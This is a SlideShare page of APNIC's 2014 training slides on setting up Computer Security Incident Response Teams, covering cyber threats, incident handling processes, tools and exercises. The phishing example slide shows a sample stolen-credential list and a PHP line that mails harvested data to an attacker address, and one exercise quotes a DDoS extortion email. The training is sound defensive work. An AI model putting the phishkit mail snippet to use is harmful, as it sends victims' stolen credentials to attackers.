SlideShare a Scribd company logo

Setting up CSIRT

APNIC
APNIC

Comprehensive slide pack on how to set up Computer Security Incident Response Teams to help combat cybercrime.

InternetTechnology
1 of 79
Download to read offline
Issue Date: Revision: Setting up Computer Security Incident Response Teams (CSIRTS) Adli Wahid Security Specialist adli@apnic.net 05 June 2014 V 1.1
About Me •  Adli Wahid •  Current Role –  Security Specialist, APNIC •  Previous Roles –  Cyber Security Manager, Bank of Tokyo-Mitsubishi UFJ –  VP Cyber Security Response Services, CyberSecurity Malaysia & Head of Malaysia CERT (MYCERT) –  Lecturer, International Islamic University Malaysia •  Follow APNIC and me on Twitter! –  @apnic && @adliwahid 3
Agenda •  Cyber Threats Landscape •  Setting up Computer / Cyber Security Response Team •  Tools for incident handling and analysis •  Exercises 4
1.0 Cybersecurity & the Threat Landscape 5
So you do ‘Security’? 6
7
Cyber Security Frame Work •  How do we think about security? •  Ensuring the CIA –  Confidentiality, Integrity, Availability •  Collection of activities to address Risk –  Risk = Threats x Vulnerabilities –  Dealing with the Known & and Unknown •  People, Process, Technology •  Dynamic & Continuous Approach –  Including Learning from Incidents –  Applying Best Current Practices 8 C I A
NIST Cyber Security Framework 9 RESPOND
The Threat Landscape •  Highlights of cyber security incidents •  What they mean for a CERT / CSIRT? •  Understanding risk and impact associated with the threats or incidents •  Thinking about actions required for dealing with the incidents 10
Cyber Threats •  Malware Related •  Data Breaches •  Distributed Denial of Service Attacks •  Web Defacement •  Spam •  Phishing •  Scanning / Attempts •  Content Related 11
Malware-Related •  The Problem –  Malicious software have different infection vectors and ‘payloads’ –  Different consequences once a computer is infected –  Millions of infected Computers –  Complex ‘infrastructure’ for spreading malware and controlling infected computers 12
Malware-Related •  Different Types of Malware –  Bots & Botnets –  Ransomware –  ExploitKits •  What do CSIRTs have to Handle? –  Infected computers –  Infection points •  Command & Controls •  Web Sites –  Organise Take-Downs Efforts (Conficker, DNSChanger) –  Write Advisory (for removal) –  Work with Law Enforcement Agencies 13
14
15 DNS Changer Working Group http://www.dnwg.org
Botnet Mitigation Techniques 16 Source: www.enisa.europa.eu
DoS and DDoS •  DoS: –  source of attack small # of nodes –  source IP typically spoofed •  DDoS –  From thousands of nodes –  IP addresses often not spoofed •  What you need to Handle –  Source of DDoS attack •  What if IP is spoofed? –  Victim of DDoS attack –  Services/Sites facilitating DDoS attacks •  Help promote BCP38 / Source Address Validation too! 17
Distributed DoS: DDos 18 Internetattacker victim bot bot bot bot Attacker takes over many machines, called “bots”. Potential bots are machines with vulnerabilities. bot processes wait for command from attacker to flood a target
DDoS: Reflection attack 19 attacker victim DNS server DNS server DNS server DNS server request request request request reply reply reply reply Source IP = victim’s IP
DDoS: Reflection attack •  Spoof source IP address = victim’s IP •  Goal: generate lengthy or numerous replies for short requests: amplification –  Without amplification: would it make sense? •  January 2001 attack: –  requests for large DNS record –  generated 60-90 Mbps of traffic •  Reflection attack can be also be done with Web and other services 20
21 Source: https://dnsscan.shadowserver.org/index.html Shadow Server - Open Resolver Scanning Project
Data Breaches •  The Problem –  Thousands and Hundreds of Credentials (username and passwords) being exposed and shared publicly •  By accident or or purpose •  i.e. on scribd •  CSIRTs/CERTs are contacted to handle / co-ordinate so that accounts are not further abused •  Handling –  Contacting the owners of credentials –  Contacting owner of system where credentials are being dumped •  SQL injection vulnerability, Misconfiguration –  Improving authentication mechanism (2FA?) –  Removing the credentials 22
Phishing •  The Problem –  Active attempt to trick users to give credentials –  Use a combination of email, social media and fake websites •  What needs to be handled –  Source of Phishing Email –  Fake website –  Credentials stolen –  Accounts or sites collecting phishing credentials (drop sites) 23
Dear Intelligent User, We have introduced a new security feature on our website. Please reactivate your account here: http://www.bla.com.my p.s This is NOT a Phish Email Login Password din:1234567 joey:cherry2148 boss:abcdefgh123 finance:wky8767 admin:testtest123 <? $mailto=‘criminal@gmail.com’; mail($mailto,$subject, $message); ?> Phishing Example 24 1 2 3 4
Spam •  The Problem –  Unsolicited Emails –  Waste of bandwith, cost money –  Leads to other problems •  What you need to handle –  Source of email 25
Spam with Malware 26
Only 5 out of 42 AVs Detect This 27
Compromised Web Sites •  The Problem –  Web sites compromised leading to defacement or abused for other types of attacks –  Possibly caused by https://www.owasp.org/index.php/ Category:OWASP_Top_Ten_Project –  Mass Defacements –  Pre-Announced Attacks •  What you need to handle / co-ordinate –  Contacting owner of the website –  Handling the source of attack 28
Recap on Cyber Threats •  Understanding the different types of cyber threats is the first step before you start handling or responding to the incidents •  Abuse or IRT contacts could be the first to be contacted •  Questions to ask –  How does it work? –  What are the impact? –  What do we have to ‘handle’? –  Who should I contact / escalate? –  What should be prioritized? •  CSIRTS/CERTS can be contacted at the different stages of the attacks or incidents 29
2.0 Incident handling & Response Framework 30
Outcomes of this Module 1.  Understand the importance of responding and handling security incidents 2.  Familiar with the requirements for setting up a CERT / CSIRT 3.  Identify organisations to connect with for collaboration & cooperation 31
32
Incidents Happens! •  Despite your best efforts keep the internet safe, secure and reliable – things happens •  What we have seen –  Malware, Botnets, Exploit Kits, Ramsomware, DDoS Attacks, Anonymous, 0-days, Web Defacement –  Data Breaches and Disclosures –  And Many more! •  What is the worst that can happen to you? 33
Incident Happens! (2) •  Incident may affect –  Your Organisation –  Your Customers –  Your country (think Critical Infrastructure) •  Must be managed in order to –  Limit Damage –  Recover (Fix/Patch) –  Prevent recurrence –  Prevent Further Abuse 34
Exercise-1 •  You might have an incident already •  Visit www.zone-h.com/archive •  Enable filters –  Insert domain •  Let’s Discuss –  What can we learn from this? –  What is the risk for publication of defaced websites? –  Going back to our formula: Risk = Threats + Vulnerabilities 35
Exercise-1: Discussion •  Detection –  How do I know about incidents affecting me •  Analysis –  How ‘bad’ is the situation –  Google for ZeusTracker, MalwareDomainList •  Recover –  How do I fix this •  Lessons Learned –  How can we prevent this happening in the future –  Think PPT! –  Can series of action be co-ordinated? 36
Whois Database IRT Object •  IRT - Incident Response Team •  Reporting of network abuse can be directed to specialized teams such as Incident Response Teams (IRTs) •  Implemented in AP region by policy Prop-079 in November 2010. –  Mandatory for inetnum, inet6num and aut-num, objects created and updated in whois database •  In essence, the contact information must be reachable and can do something about an incident! 37
inetnum: 1.1.1.0 - 1.1.1.255 netname: APNIC-LABS descr: Research prefix for APNIC Labs descr: APNIC country: AU admin-c: AR302-AP tech-c: AR302-AP mnt-by: APNIC-HM mnt-routes: MAINT-AU-APNIC-GM85-AP mnt-irt: IRT-APNICRANDNET-AU status: ASSIGNED PORTABLE changed: hm-changed@apnic.net 20140507 changed: hm-changed@apnic.net 20140512 source: APNIC irt: IRT-APNICRANDNET-AU address: PO Box 3646 address: South Brisbane, QLD 4101 address: Australia e-mail: abuse@apnic.net abuse-mailbox: abuse@apnic.net admin-c: AR302-AP tech-c: AR302-AP auth: # Filtered mnt-by: MAINT-AU-APNIC-GM85-AP changed: hm-changed@apnic.net 20110922 source: APNIC Whois Database Incident Response Team Object 38
What is incident? •  ITIL terminology defines an incident as: –  Any event which is not part of the standard operation of a service and which causes, or may cause, an interruption to, or a reduction in, the quality of that service •  ISO27001 defines an incident as: –  any event which is not part of the standard operation of a service and which causes or may cause an interruption to, or a reduction in, the quality of that service. 39
Incident Response vs. Incident Handling? •  Incident Response is all of the technical components required in order to analyze and contain an incident. –  Skills: requires strong networking, log analysis, and forensics skills. •  Incident Handling is the logistics, communications, coordination, and planning functions needed in order to resolve an incident in a calm and efficient manner. [isc.sans.org] 40
What is Event? •  An “event” is any observable occurrence in a system and/or network •  Not all events are incidents but all incidents are events 41
Objective of Incident Response •  To mitigate or reduce risks associated to an incident •  To respond to all incidents and suspected incidents based on pre-determined process •  Provide unbiased investigations on all incidents •  Establish a 24x7 hotline/contact – to enable effective reporting of incidents. •  Control and contain an incident –  Affected systems return to normal operation –  Recommend solutions – short term and long term solutions 42
Dealing with Incidents – Bottom Line •  What happens if you don’t deal with incidents? –  Become Tomorrow’s Headline (Image) –  I or Domain Blacklisted (Availability & Financial Loss) •  Linked to Criminals •  The World needs you! –  Trusted point of contact (information on infected or compromised hosts –  Doing your bit to keep the Internet a safe and secure place for everyone! 43
The CSIRT Organisation •  Defining the CSIRT Organisation •  Mission Statement –  High level definition of what the team will do •  Constituency –  Whose incidents are we going to be handling or responsible for –  And to what extent •  CSIRT position / location in the Organisation •  Relation to other teams (or organisations) 44
Possible Activities of CSIRTs • Incident Handling • Alerts & Warnings • Vulnerability Handling • Artefact Handling • Announcements • Technology Watch • Audits/Assessments • Configure and Maintain Tools/ Applications/Infrastructure • Security Tool Development • Intrusion Detection • Information Dissemination • Risk Analysis • Business Continuity Planning • Security Consulting • Awareness Building • Education/Training • Product Evaluation List from CERT-CC (www.cert.org/csirts/) 45
Operations & Availability •  Incidents don’t happen on a particular day or time •  How to ensure 24 x7 reachability? –  IRT Object In WHOIS Database –  Email (Mailing List) –  Phone, SMSes –  Information on the Website –  Relationship with National CSIRTs and Others Relevant Organisations •  ISPS, Vendors, Law Enforcement Agencies 46
Different kinds of CSIRTs •  The type of activities, focus and capabilities may be different •  Some examples –  National CSIRTs –  Vendor CSIRTs –  (Network & Content) Providers Teams 47
Resources Consideration (1) •  People, Process and Technology Requirements •  People –  Resources for: •  Handling Incidents Reports (Dedicated?) •  Technical Analysis & Investigation –  What kinds of skills are required ? •  Familiarity with technology •  Familiarity with different types of security incidents •  Non Technical skills – Communication, Writing •  Trustworthiness 48
Resources Requirements (2) •  Process & Procedures –  Generally from the beginning of incident till when we resolve the incident –  Including lessons learned & improvement of current policies or procedures –  Must be clear so that people know what do to –  Importance •  Specific Procedures for Handling Specific types of Incidents –  Malware Related –  DDoS –  Web Defacement –  Fraud –  Data Breach 49
Source: Special Publication 800-61* Computer Security Incident Handling Guide page 3-1 * http://csrc.nist.gov/publications/nistpubs/800-61-rev1/SP800-61rev1.pdf Incident Response/ & Handling 50
Applying the Framework - Responding to a DDOS Incident 1.  Preparation 2.  Identification 3.  Containment 4.  Remediation 5.  Recovery 6.  Aftermath/Lessons Learned 51 Reference: cert.societegenerale.com/resources/files/IRM-4-DDoS.pdf
Example Team Structure •  First Level –  Helpdesk, Perform Triage •  2nd Level –  Specialists •  Network Forensics •  Malware Specialists •  Web Security Specialists •  Overall Co-ordination 52
Understanding Role of Others in the Organisation •  Different roles in the organisations –  CEO: to maximise shareholder value –  PR officer: to present a good image to the press –  Corporate Risk: to care about liabilities, good accounting, etc. –  CSIRT: to prevent and resolve incidents •  Don’t assume these interests automatically coincide - but with your help, they can ! 53
Technical Non- Technical Incident Response/Handling – Skills / Activities Overview 54 Logistics Coordination Communication Planning Log Analysis Forensics Network Reversing
Resources Requirements •  Technology / Tools •  Essentially 2 parts –  For handling Incidents & Incidents Related Artifacts •  Managing tickets, secure communications, etc •  RTIR, OTRS, AIRT are some good examples –  Tools & Resources for Analysis & Investigation •  Depending on the type of work that is required •  For performing: –  Hosts Analysis, Log Analysis, Traffic Analysis, Network Monitoring, Forensics, Malware Analysis –  Tools that support standards for exchanging Threat Intels with other teams (STIX & TAXII) 55
OTRS Fax server Email Phone Web form SMS IDS alerts Other Sources 56 Example: Incident Reporting Channels Integration with OTRS
Phish Response Checklist 1.  Analyse / Report of Spam 2.  Phishing Site Take Down –  Removal / Suspension –  Browser Notification 3.  Phishing Site Analysis –  Phishkits ? 4.  Credentials ‘Stolen’ –  Notify Users 5.  Report / Escalation 6.  Lessons Learned 57
Advisories and Alerts •  Scenarios that potentially require Advisory or Alert –  Incident that could potential have a wide-scale impact –  Examples •  Declaration by attacker to launch attack •  Critical vulnerability of ‘popular’ software in the constituency •  Some types of Incidents Require action by those in your consituencies –  They have to apply the patch themselves –  Their network or systems are not reachable to you –  They must perform additional risk assessment –  Perform check so that to ensure that they are not vulnerable 58
Advisories and Alerts (2) •  Content –  Should be clear & concise •  What is impacted •  If fix available or workaround –  Shouldn’t be confusing –  Guide on how to determine or apply fix could be useful •  Distribution of advisory and alerts –  Preparation of targeted list based on industry, common systems, groups –  Using suitable platforms to reach out (including media) –  Goal is to reach out as quick as possible the right •  Special Programs with Vendors –  Early alert – i.e. Microsoft 59
Working with Law Enforcement Agencies & Judiciary Sector •  Some incidents have elements of crime –  ‘Cyber’ or non-cyber laws –  Regulatory framework •  Implication –  Must work with Law Enforcement Agency (must notify) –  Preservation of digital evidence (logs, images, etc) •  Proper configuration of systems, time etc –  Working together with LEAs to investigate •  Monitoring, recording and tracking •  Responding to requests •  Training and Cyber Security Exercises can help to create awareness 60
Collaboration & Information Sharing •  Bad guys work together, Good guys should too! •  Make yourself known, establish trust, collaborate and learn from others •  Association of CSIRTS –  National CSIRTs groups (in some countries) –  Regional – APCERT, OIC-CERT, TF-CSIRT –  Global – FIRST.org •  Closed & Trusted Security Groups –  NSP-SEC –  OPS-TRUST •  Getting Feeds about your constituencies (and sharing with them) –  ShadowServer Foundation –  Team Cymru –  Honeynet Project 61
Getting Involved •  Global Take Downs / Co-ordinated Response –  DNSChanger Working Group –  Conficker Working Group •  Cyber Security Exercises –  Multiple Teams & Multiple Scenarios activities –  Getting to know your peers and improving internal processes as capabilities –  Example: APCERT Drill, ASEAN Drill, etc •  Helping Promote Best Practices & Awareness –  Source Address Validation (BCP 38) –  APWG Stop – Think – Connect (APWG.org) 62
Collaboration & Co-operation •  Check out some of the security organisations mentioned earlier –  APCERT – http://www.apcert.org –  FIRST – http://www.first.org –  ShadowServer Foundation http://www.shadowserver.org –  Team Cymru - https://www.team-cymru.org/Services/ –  Honeynet Project – http://www.honeynet.org 63
Managing CSIRT •  Having sufficient resources is critical to maintain cert / csirt operation •  Consider having funds for traveling to participate in workshops, training and meetings 64
3.0 Free / Open Source Tools 65
About this Module •  This module covers some publicly available tools that can be used for managing incident reports and performing (initial) analysis •  Depending on the nature of the incident, different sets of tools will have to be used by the incident responder •  It is by no means comprehensive but useful to gain initial insights when handling an incident 66
Managing Incident Reports •  There may be multiple ways to contact a CERT / CSIRT –  Email, Web Form, Fax, Security Systems –  Should ensure that reports (tickets) are attended to •  Workflow System for managing abuse reports and artifacts –  Web-based system –  Reflect policies for incident response / handling activities –  Artifacts: Logs, executables –  Generate reports for review and lessons learned •  Some Solutions: –  RTIR: RT for Incident Response http://bestpractical.com/rtir/ –  OTRS: https://www.otrs.com/software/open-source/ 67
Malicious software, files, URLs analysis service 1.  Malwr Sandbox –  http://www.malwr.com –  Based on Cuckoo Sandbox (Open Source) 2.  Anubis –  http://anubis.iseclab.org/ 3.  VirusTotal –  http://www.virustotal.com 4.  Wepawet –  http://wepawet.iseclab.org/ 68
Spam and Web Defacement •  Spam Header Analysis –  http://mxtoolbox.com/Public/Tools/EmailHeaders.aspx •  Zone-H Defacement Archive –  http://www.zone-h.com 69
Whois Database & Passive DNS •  The whois database is an indispensable tool for incident handling. •  RIR’s whois database gives information about a network i.e. who is the point contact •  But we need historical data on who use to own it –  May show something suspicious •  Passive DNS: –  http://www.bfk.de/bfk_dnslogger.html 70
Abuse Information about your Network •  There are multiple initiatives on the Internet that could be of use to gain information about abuses or potential abuses on your network 1.  Abuse.ch – Zeus, SpyEye, Palevo, Feodo malware Tracker i.e. http://zeustracker.abuse.ch 2.  Malware Domain List –  http://www.malwaredomainlist.com/ –  http://www.malwaredomains.com/ 3.  Open DNS Resolvers –  http://openresolverproject.org/ 71
Secure Communication Tools •  Best Practice to have use GnuPG/PGP for communication –  For signing and/or encrypting messages –  Extremely useful for information sharing (especially on need to know basis) •  Keys that belong to others (teams or individuals) are published on public PGP key servers –  http://pgp.mit.edu •  ‘Key-signing’ parties are common at CSIRT meetings or gathering 72
4.0 Exercises (Discussion) 73
Exercise – 1 •  Defining your CERT/CSIRT based on RFC2350 –  RFC2350 - Expectations for Computer Security Incident Response –  https://www.rfc-editor.org/rfc/rfc2350.txt 74
Exercise 2 – From .RU (or somewhere) with Love 75 Date: Day, Month 2011 Subject: Partnership From: Attacker To: Victim Your site does not work because We attack your site. When your company will pay to us we will stop attack. Contact the director. Do not lose clients.
Exercise 3 – Writing a Security Advisory •  Information about critical vulnerability affecting a popular application. •  Write a security advisory to your constituent explaining the situation and action required of them 76
Recap •  We have covered –  The bigger picture – Managing Risks and Cyber Security –  The need to respond to incidents –  Setting up Security Response Teams •  Defining the Team & Team Structure •  Resources required •  Policies, SOPs, SLAs •  Tools for incident handlers •  Making yourself known and working with others •  Keep Calm & Incident Response! 77
Questions ? Keep in touch! Adli Wahid adli@apnic.net Check out: http://training.apnic.net 78
APNIC Survey 2014 •  11 -22 June 2014 •  Opportunity to provide input on APNIC’s performance, development, and future direction •  Contributes to APNIC’s future planning processes •  Run by an impartial, independent research organization •  Confidentiality of respondents guaranteed 79 survey.apnic.net
You’re Invited! •  APRICOT 2015: Fukuoka, Japan, 24 Feb-6 Mar 2015 80

Recommended

Cyber Security Incident Response
Cyber Security Incident ResponseCyber Security Incident Response
Cyber Security Incident Response
PECB
 
Cyber security career development paths
Cyber security career development pathsCyber security career development paths
Cyber security career development paths
Chelsea Jarvie
 
Security operation center (SOC)
Security operation center (SOC)Security operation center (SOC)
Security operation center (SOC)
Ahmed Ayman
 
Incident response
Incident responseIncident response
Incident response
Anshul Gupta
 
Social Engineering - Are You Protecting Your Data Enough?
Social Engineering - Are You Protecting Your Data Enough?Social Engineering - Are You Protecting Your Data Enough?
Social Engineering - Are You Protecting Your Data Enough?
JamRivera1
 
Cybersecurity Incident Management Powerpoint Presentation Slides
Cybersecurity Incident Management Powerpoint Presentation SlidesCybersecurity Incident Management Powerpoint Presentation Slides
Cybersecurity Incident Management Powerpoint Presentation Slides
SlideTeam
 
kill-chain-presentation-v3
kill-chain-presentation-v3kill-chain-presentation-v3
kill-chain-presentation-v3
Shawn Croswell
 
1. Security and Risk Management
1. Security and Risk Management1. Security and Risk Management
1. Security and Risk Management
Sam Bowne
 

Recommended

Cyber Security Incident Response
Cyber Security Incident ResponseCyber Security Incident Response
Cyber Security Incident Response
PECB
 
Cyber security career development paths
Cyber security career development pathsCyber security career development paths
Cyber security career development paths
Chelsea Jarvie
 
Security operation center (SOC)
Security operation center (SOC)Security operation center (SOC)
Security operation center (SOC)
Ahmed Ayman
 
Incident response
Incident responseIncident response
Incident response
Anshul Gupta
 
Social Engineering - Are You Protecting Your Data Enough?
Social Engineering - Are You Protecting Your Data Enough?Social Engineering - Are You Protecting Your Data Enough?
Social Engineering - Are You Protecting Your Data Enough?
JamRivera1
 
Cybersecurity Incident Management Powerpoint Presentation Slides
Cybersecurity Incident Management Powerpoint Presentation SlidesCybersecurity Incident Management Powerpoint Presentation Slides
Cybersecurity Incident Management Powerpoint Presentation Slides
SlideTeam
 
kill-chain-presentation-v3
kill-chain-presentation-v3kill-chain-presentation-v3
kill-chain-presentation-v3
Shawn Croswell
 
1. Security and Risk Management
1. Security and Risk Management1. Security and Risk Management
1. Security and Risk Management
Sam Bowne
 
CYBER SECURITY CAREER GUIDE CHEAT SHEET
CYBER SECURITY CAREER GUIDE CHEAT SHEETCYBER SECURITY CAREER GUIDE CHEAT SHEET
CYBER SECURITY CAREER GUIDE CHEAT SHEET
TravarsaPrivateLimit
 
Social engineering
Social engineeringSocial engineering
Social engineering
Robert Hood
 
Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...
Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...
Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...
Edureka!
 
Cybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationCybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your Organization
TriCorps Technologies
 
Cyber Kill Chain.pptx
Cyber Kill Chain.pptxCyber Kill Chain.pptx
Cyber Kill Chain.pptx
Vivek Chauhan
 
Security Operation Center Fundamental
Security Operation Center FundamentalSecurity Operation Center Fundamental
Security Operation Center Fundamental
Amir Hossein Zargaran
 
INCIDENT RESPONSE OVERVIEW
INCIDENT RESPONSE OVERVIEWINCIDENT RESPONSE OVERVIEW
INCIDENT RESPONSE OVERVIEW
Sylvain Martinez
 
Welcome to the world of Cyber Threat Intelligence
Welcome to the world of Cyber Threat IntelligenceWelcome to the world of Cyber Threat Intelligence
Welcome to the world of Cyber Threat Intelligence
Andreas Sfakianakis
 
Cybersecurity Audit
Cybersecurity AuditCybersecurity Audit
Cybersecurity Audit
EC-Council
 
MITRE ATT&CK Framework
MITRE ATT&CK FrameworkMITRE ATT&CK Framework
MITRE ATT&CK Framework
n|u - The Open Security Community
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
Rick Wanner
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report
Morane Decriem
 
Cyber Security 101: Training, awareness, strategies for small to medium sized...
Cyber Security 101: Training, awareness, strategies for small to medium sized...Cyber Security 101: Training, awareness, strategies for small to medium sized...
Cyber Security 101: Training, awareness, strategies for small to medium sized...
Stephen Cobb
 
Security Operations Center (SOC) Essentials for the SME
Security Operations Center (SOC) Essentials for the SMESecurity Operations Center (SOC) Essentials for the SME
Security Operations Center (SOC) Essentials for the SME
AlienVault
 
Threat hunting and achieving security maturity
Threat hunting and achieving security maturityThreat hunting and achieving security maturity
Threat hunting and achieving security maturity
DNIF
 
Security operations center-SOC Presentation-مرکز عملیات امنیت
Security operations center-SOC Presentation-مرکز عملیات امنیتSecurity operations center-SOC Presentation-مرکز عملیات امنیت
Security operations center-SOC Presentation-مرکز عملیات امنیت
ReZa AdineH
 
Next-Gen security operation center
Next-Gen security operation centerNext-Gen security operation center
Next-Gen security operation center
Muhammad Sahputra
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operations
Sergey Soldatov
 
An introduction to SOC (Security Operation Center)
An introduction to SOC (Security Operation Center)An introduction to SOC (Security Operation Center)
An introduction to SOC (Security Operation Center)
Ahmad Haghighi
 
Cyber Security Best Practices
Cyber Security Best PracticesCyber Security Best Practices
Cyber Security Best Practices
Evolve IP
 
Noah Maina: Computer Emergency Response Team (CERT)
Noah Maina: Computer Emergency Response Team (CERT)Noah Maina: Computer Emergency Response Team (CERT)
Noah Maina: Computer Emergency Response Team (CERT)
Hamisi Kibonde
 
Day 1 Enisa Setting Up A Csirt
Day 1 Enisa Setting Up A CsirtDay 1 Enisa Setting Up A Csirt
Day 1 Enisa Setting Up A Csirt
vngundi
 

More Related Content

What's hot

CYBER SECURITY CAREER GUIDE CHEAT SHEET
CYBER SECURITY CAREER GUIDE CHEAT SHEETCYBER SECURITY CAREER GUIDE CHEAT SHEET
CYBER SECURITY CAREER GUIDE CHEAT SHEET
TravarsaPrivateLimit
 
Welcome to the world of Cyber Threat Intelligence
Welcome to the world of Cyber Threat IntelligenceWelcome to the world of Cyber Threat Intelligence
Welcome to the world of Cyber Threat Intelligence
Andreas Sfakianakis
 
Security Operations Center (SOC) Essentials for the SME
Security Operations Center (SOC) Essentials for the SMESecurity Operations Center (SOC) Essentials for the SME
Security Operations Center (SOC) Essentials for the SME
AlienVault
 
Security operations center-SOC Presentation-مرکز عملیات امنیت
Security operations center-SOC Presentation-مرکز عملیات امنیتSecurity operations center-SOC Presentation-مرکز عملیات امنیت
Security operations center-SOC Presentation-مرکز عملیات امنیت
ReZa AdineH
 

What's hot (20)

CYBER SECURITY CAREER GUIDE CHEAT SHEET
CYBER SECURITY CAREER GUIDE CHEAT SHEETCYBER SECURITY CAREER GUIDE CHEAT SHEET
CYBER SECURITY CAREER GUIDE CHEAT SHEET
 
Social engineering
Social engineeringSocial engineering
Social engineering
 
Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...
Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...
Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...
 
Cybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationCybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your Organization
 
Cyber Kill Chain.pptx
Cyber Kill Chain.pptxCyber Kill Chain.pptx
Cyber Kill Chain.pptx
 
Security Operation Center Fundamental
Security Operation Center FundamentalSecurity Operation Center Fundamental
Security Operation Center Fundamental
 
INCIDENT RESPONSE OVERVIEW
INCIDENT RESPONSE OVERVIEWINCIDENT RESPONSE OVERVIEW
INCIDENT RESPONSE OVERVIEW
 
Welcome to the world of Cyber Threat Intelligence
Welcome to the world of Cyber Threat IntelligenceWelcome to the world of Cyber Threat Intelligence
Welcome to the world of Cyber Threat Intelligence
 
Cybersecurity Audit
Cybersecurity AuditCybersecurity Audit
Cybersecurity Audit
 
MITRE ATT&CK Framework
MITRE ATT&CK FrameworkMITRE ATT&CK Framework
MITRE ATT&CK Framework
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report
 
Cyber Security 101: Training, awareness, strategies for small to medium sized...
Cyber Security 101: Training, awareness, strategies for small to medium sized...Cyber Security 101: Training, awareness, strategies for small to medium sized...
Cyber Security 101: Training, awareness, strategies for small to medium sized...
 
Security Operations Center (SOC) Essentials for the SME
Security Operations Center (SOC) Essentials for the SMESecurity Operations Center (SOC) Essentials for the SME
Security Operations Center (SOC) Essentials for the SME
 
Threat hunting and achieving security maturity
Threat hunting and achieving security maturityThreat hunting and achieving security maturity
Threat hunting and achieving security maturity
 
Security operations center-SOC Presentation-مرکز عملیات امنیت
Security operations center-SOC Presentation-مرکز عملیات امنیتSecurity operations center-SOC Presentation-مرکز عملیات امنیت
Security operations center-SOC Presentation-مرکز عملیات امنیت
 
Next-Gen security operation center
Next-Gen security operation centerNext-Gen security operation center
Next-Gen security operation center
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operations
 
An introduction to SOC (Security Operation Center)
An introduction to SOC (Security Operation Center)An introduction to SOC (Security Operation Center)
An introduction to SOC (Security Operation Center)
 
Cyber Security Best Practices
Cyber Security Best PracticesCyber Security Best Practices
Cyber Security Best Practices
 

Viewers also liked

Noah Maina: Computer Emergency Response Team (CERT)
Noah Maina: Computer Emergency Response Team (CERT)Noah Maina: Computer Emergency Response Team (CERT)
Noah Maina: Computer Emergency Response Team (CERT)
Hamisi Kibonde
 
Etude Statistique d'un mois de Vulnérabilités en Afrique
Etude Statistique d'un mois de Vulnérabilités en AfriqueEtude Statistique d'un mois de Vulnérabilités en Afrique
Etude Statistique d'un mois de Vulnérabilités en Afrique
Valdes Nzalli
 
Mitigating worm attacks
Mitigating worm attacksMitigating worm attacks
Mitigating worm attacks
dkaya
 
First_Aid Emergency Response [Compatibility Mode]
First_Aid Emergency Response [Compatibility Mode]First_Aid Emergency Response [Compatibility Mode]
First_Aid Emergency Response [Compatibility Mode]
asghar havasi
 

Viewers also liked (20)

Noah Maina: Computer Emergency Response Team (CERT)
Noah Maina: Computer Emergency Response Team (CERT)Noah Maina: Computer Emergency Response Team (CERT)
Noah Maina: Computer Emergency Response Team (CERT)
 
Day 1 Enisa Setting Up A Csirt
Day 1 Enisa Setting Up A CsirtDay 1 Enisa Setting Up A Csirt
Day 1 Enisa Setting Up A Csirt
 
CyberTerrorism - Security in Cyberspace
CyberTerrorism - Security in CyberspaceCyberTerrorism - Security in Cyberspace
CyberTerrorism - Security in Cyberspace
 
Collaboration Between Infosec Community and CERT Teams : Project Sonar case
Collaboration Between Infosec Community and CERT Teams : Project Sonar caseCollaboration Between Infosec Community and CERT Teams : Project Sonar case
Collaboration Between Infosec Community and CERT Teams : Project Sonar case
 
Etude Statistique d'un mois de Vulnérabilités en Afrique
Etude Statistique d'un mois de Vulnérabilités en AfriqueEtude Statistique d'un mois de Vulnérabilités en Afrique
Etude Statistique d'un mois de Vulnérabilités en Afrique
 
NTT-CERT Activities by Yoshiki Sugiura [APRICOT 2015]
NTT-CERT Activities by Yoshiki Sugiura [APRICOT 2015]NTT-CERT Activities by Yoshiki Sugiura [APRICOT 2015]
NTT-CERT Activities by Yoshiki Sugiura [APRICOT 2015]
 
20 Questions to Basic Chinese Fluency
20 Questions to Basic Chinese Fluency20 Questions to Basic Chinese Fluency
20 Questions to Basic Chinese Fluency
 
Crytek CSIRT CERT-EE Symposium 2016
Crytek CSIRT CERT-EE Symposium 2016Crytek CSIRT CERT-EE Symposium 2016
Crytek CSIRT CERT-EE Symposium 2016
 
Computer viruses
Computer virusesComputer viruses
Computer viruses
 
What is CERT 1.22.2015
What is CERT 1.22.2015What is CERT 1.22.2015
What is CERT 1.22.2015
 
PT workout project
PT workout projectPT workout project
PT workout project
 
Meletis Belsis -CSIRTs
Meletis Belsis -CSIRTsMeletis Belsis -CSIRTs
Meletis Belsis -CSIRTs
 
Mitigating worm attacks
Mitigating worm attacksMitigating worm attacks
Mitigating worm attacks
 
First_Aid Emergency Response [Compatibility Mode]
First_Aid Emergency Response [Compatibility Mode]First_Aid Emergency Response [Compatibility Mode]
First_Aid Emergency Response [Compatibility Mode]
 
Command systems
Command systemsCommand systems
Command systems
 
CERT
CERTCERT
CERT
 
Ceh v5 module 16 virus and worms
Ceh v5 module 16 virus and wormsCeh v5 module 16 virus and worms
Ceh v5 module 16 virus and worms
 
The Stuxnet Worm creation process
The Stuxnet Worm creation processThe Stuxnet Worm creation process
The Stuxnet Worm creation process
 
Mab khotolbor
Mab khotolborMab khotolbor
Mab khotolbor
 
Mon cirt khaltar
